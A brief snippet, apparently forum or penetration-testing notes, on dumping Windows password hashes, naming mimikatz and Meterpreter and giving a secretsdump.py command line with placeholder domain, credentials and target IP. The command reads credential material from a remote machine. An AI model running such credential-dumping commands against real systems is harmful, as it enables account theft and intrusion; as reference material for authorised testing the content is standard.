You can dump passwords (or NTML hash with Windows >=8.1) with mimikatz. Meterpreter should help with that iirc.
Performs various techniques to dump hashes from the remote machine without executing any agent there.
python3 secretsdump.py FULLY_QUALIFIED_DOMAIN_NAME/USERNAME:PASSWORD@IP_ADDRESS
